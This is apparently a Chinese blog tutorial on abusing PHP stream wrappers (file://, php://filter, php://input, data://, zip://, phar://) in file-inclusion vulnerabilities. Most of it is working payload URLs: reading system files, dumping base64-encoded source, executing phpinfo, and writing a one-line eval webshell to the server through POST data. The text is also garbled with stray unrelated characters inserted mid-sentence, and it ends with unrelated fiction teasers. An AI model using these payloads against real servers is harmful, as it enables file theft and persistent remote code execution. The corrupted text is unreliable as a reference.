偽協(xié)議

1. 常見偽協(xié)議

file:// — 訪問本地文件系統(tǒng)
http:// — 訪問 HTTP(s) 網(wǎng)址
ftp:// — 訪問 FTP(s) URLs
php:// — 訪問各個輸入/輸出流(I/O streams)
zlib:// — 壓縮流
data:// — 數(shù)據(jù)(RFC 2397)
glob:// — 查找匹配的文件路徑模式
phar:// — PHP 歸檔
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音頻流
expect:// — 處理交互式的流


image.png

2. 具體用法實例

$filename=$_GET['filename'];
在文件包含中如果是include $_GET("$filename");可以直接使用偽協(xié)議包含指定文件
但是如果加了文件夾限制就會導(dǎo)致偽協(xié)議失效如:include 'image/$filename' ,此時可以使用../進行目錄穿越包含

include "include/$filename"

2.1 file協(xié)議用法

  • file://[文件的絕對路徑和文件名]
    http://127.0.0.1/include.php?file=file://C:/windows/win.ini
  • file://[文件的相對路徑和文件名]
    http://127.0.0.1/include.php?file=./phpinfo.txt

2.2 http協(xié)議用法

http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt

2.3 php協(xié)議用法

  • 讀取網(wǎng)站源碼
    php://filter/read=convert.base64-encode/resource=[文件名]
  • 執(zhí)行php代碼
    通過php://input協(xié)議結(jié)合post數(shù)據(jù)
1. 查看phpinfo
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php phpinfo(); ?>
2. 寫入一句話木馬
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

2.4 壓縮流協(xié)議phar://硅卢、zip://县好、bzip2://藤滥、zlib://

  • zip:// 蠢络、 bzip2:// 、 zlib:// 均屬于壓縮流效览,可以訪問壓縮文件中的子文件
  • 如訪問phpinfo.zip壓縮包中的phpinfo.txt文件
http://127.0.0.1/include.phpfile=phar://E:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt

2.5 data數(shù)據(jù)流協(xié)議

  • 通澄耷校可以用來執(zhí)行PHP代碼
1、data://text/plain,  #執(zhí)行phpinfo
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
2丐枉、data://text/plain;base64, # 執(zhí)行base64編碼后的代碼
http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末哆键,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子瘦锹,更是在濱河造成了極大的恐慌籍嘹,老刑警劉巖,帶你破解...
    沈念sama閱讀 221,695評論 6 515
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件弯院,死亡現(xiàn)場離奇詭異辱士,居然都是意外死亡,警方通過查閱死者的電腦和手機听绳,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,569評論 3 399
  • 文/潘曉璐 我一進店門颂碘,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人椅挣,你說我怎么就攤上這事头岔。” “怎么了贴妻?”我有些...
    開封第一講書人閱讀 168,130評論 0 360
  • 文/不壞的土叔 我叫張陵,是天一觀的道長蝙斜。 經(jīng)常有香客問我名惩,道長,這世上最難降的妖魔是什么孕荠? 我笑而不...
    開封第一講書人閱讀 59,648評論 1 297
  • 正文 為了忘掉前任娩鹉,我火速辦了婚禮,結(jié)果婚禮上稚伍,老公的妹妹穿的比我還像新娘弯予。我一直安慰自己,他們只是感情好个曙,可當(dāng)我...
    茶點故事閱讀 68,655評論 6 397
  • 文/花漫 我一把揭開白布锈嫩。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪呼寸。 梳的紋絲不亂的頭發(fā)上艳汽,一...
    開封第一講書人閱讀 52,268評論 1 309
  • 那天,我揣著相機與錄音对雪,去河邊找鬼河狐。 笑死,一個胖子當(dāng)著我的面吹牛瑟捣,可吹牛的內(nèi)容都是我干的馋艺。 我是一名探鬼主播,決...
    沈念sama閱讀 40,835評論 3 421
  • 文/蒼蘭香墨 我猛地睜開眼迈套,長吁一口氣:“原來是場噩夢啊……” “哼捐祠!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起交汤,我...
    開封第一講書人閱讀 39,740評論 0 276
  • 序言:老撾萬榮一對情侶失蹤雏赦,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后芙扎,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體星岗,經(jīng)...
    沈念sama閱讀 46,286評論 1 318
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,375評論 3 340
  • 正文 我和宋清朗相戀三年戒洼,在試婚紗的時候發(fā)現(xiàn)自己被綠了俏橘。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 40,505評論 1 352
  • 序言:一個原本活蹦亂跳的男人離奇死亡圈浇,死狀恐怖寥掐,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情磷蜀,我是刑警寧澤召耘,帶...
    沈念sama閱讀 36,185評論 5 350
  • 正文 年R本政府宣布,位于F島的核電站褐隆,受9級特大地震影響污它,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜庶弃,卻給世界環(huán)境...
    茶點故事閱讀 41,873評論 3 333
  • 文/蒙蒙 一衫贬、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧歇攻,春花似錦固惯、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,357評論 0 24
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽镇辉。三九已至,卻和暖如春供常,著一層夾襖步出監(jiān)牢的瞬間摊聋,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,466評論 1 272
  • 我被黑心中介騙來泰國打工栈暇, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留麻裁,地道東北人。 一個月前我還...
    沈念sama閱讀 48,921評論 3 376
  • 正文 我出身青樓源祈,卻偏偏與公主長得像煎源,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子香缺,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,515評論 2 359

推薦閱讀更多精彩內(nèi)容